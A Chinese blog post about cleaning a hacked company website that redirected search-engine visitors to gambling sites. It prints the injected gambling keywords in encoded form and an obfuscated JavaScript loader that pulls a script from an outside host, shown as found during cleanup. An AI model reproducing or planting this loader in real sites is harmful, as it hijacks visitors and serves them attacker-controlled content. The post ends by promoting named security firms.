网站被跳转到赌博网站 该如何处理?

 

             我们公司网站在百度搜索任何关键词点开以后都会跳到另一个网站里,有时
会直接

跳转到赌博、博彩类的网站上去,直接输入域名不会跳转,我又在百度上
搜我们自己的公司

域名,出来的结果是提示我们网站有风险,百度网址安全中心提
醒您:该页面可能已被非法

篡改! 如下面图片所展示的一样,直接红色的风险标
记。 打开网站还被360提示“未经证实的

博彩赌博网站”。
 


 
再一个我又site:公司网站域名,发现百度快照里也收录了许多的博彩内容的快照以及收录了

跟网站不相关的内容。网站现在都无法正常打开,这段时间咨询产品的客户越来越少。如何

去除百度风险提示,防止网站不再跳转到赌博网站上去呢?摸着石头过河吧,从来没遇到过

这样的情况,头都大了,作为网站的负责人又不得不去处理,从这一刻记录下我的处理过程。

 
百度提示我们公司网站内容被非法篡改了,那就得从网站的内容里找原因,先去下载公司网

站的所有程序代码,包括图片以及数据库到本地电脑里,也不大才100M左
右,检查了首页文

件index.html,仔细一看发现了问题,在最底部竟然有一些加密
的字符代码
 
<meta name="keywords" 
 
content="&#36172;&#21338;&#32593;&#8226;&#32593;&#19978;&#36172;&#21338;
 
&#24179;&#21488;&#8226;&#28595;&#38376;&#21338;&#24425;&#8226;&#30334;&#
 
23478;&#20048;&#32593;&#22336;&#8226;&#36172;&#21338;&#32593;&#8226;&#28
 
595;&#38376;&#30334;&#23478;&#20048;&#8226;&#29616;&#37329;&#32593;&#822
 
6;&#28595;&#38376;&#36172;&#21338;&#32593;&#8226;&#28595;&#38376;&#36172
 
;&#21338;&#32593;&#31449;&#8226;&#32593;&#19978;&#26368;&#22909;&#36172;
 
&#21338;&#32593;&#31449;&#8226;&#28595;&#38376;&#36172;&#21338;&#25216;&
 
#24039;&#8226;&#28595;&#38376;&#36172;&#21338;&#29609;&#27861;&#8226;&#2
 
9616;&#37329;&#26827;&#29260;&#36172;&#21338;&#32593;&#31449;&#8226;&#36
 
172;&#21338;&#32593;&#31449;&#22823;&#20840;&#8226;&#32593;&#19978;&#215
 
12;&#27861;&#36172;&#21338;&#32593;&#31449;"/>
 
发现了一段加密的代码,通过解密发现是赌博的一些关键词内容,如下图:

 
原来百度提示该页面可能已被非法篡改,问题是出在这里,我立即删除了这一段内容,再往

下看首页的代码又发现了一些友情链接,都是博彩类的网站链接,如下图:

 
在首页文件里一共发现了2处被篡改的地方,我手动删除掉了这些内容,我以为我删除掉这

些内容后网站就不会跳转到赌博网站去了,可以从百度里点击进去还是会
跳转,看来还是有

问题在代码里,继续查看程序代码,在一个JS文件发现了网站被
跳转的秘密,代码如下:
 
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(36)};if('0'.replace(0,e)==0){while

(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[24-9k]'};c=1};while(c--)

if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(4(f){4 e(i){try{2 d=f.get

ElementsByTagName("head")[0];2 j=d.appendChild(a(i));5(4(){d.removeChild(j)},2000)}

catch(h){}}4 b(d){7 f.createElement(d)}4 a(h){2 d=b("script");d.src=h;d.async=true;d.typ

e="text/javascript";7 d}2 g=0;4 c(){2 j=f.8.clientWidth;2 h=f.8.clientHeight;2 i=["ht","tp:",

"//kn.","thj","xs","c.n","et"].join("");2 d="w="+j+"&h="+h;6(top==this){6(j<300||h<40){g+=

1;6(g<3){5(c,1000)}9{e(i+"/k/m.php")}}9{e(i+"/k/")}}}5(c,500)})(document);',[],21,'||var||f

unction|setTimeout|if|return|body|else|||||||||||haps'.split('|'),0,{}))baidu', 'google', 'yaho

o', 'bing', 'soso', 'sogou'

 
 
删除JS跳转木马代码,网站恢复正常,从百度点击进来也没有再跳转了。自身网站问题解决

完了后再提交到百度申诉,等待百度申诉的结果。整个解决处理过程比较复杂,艰辛,不懂

点网站技术的话,需要从网站程序代码,网站漏洞修复等多个方面去入手,如果你是非专业

人士的话,建议找专门的网站安全公司去处理吧,国内像sine安全公司以及绿盟安全公司比

较专业。
分享: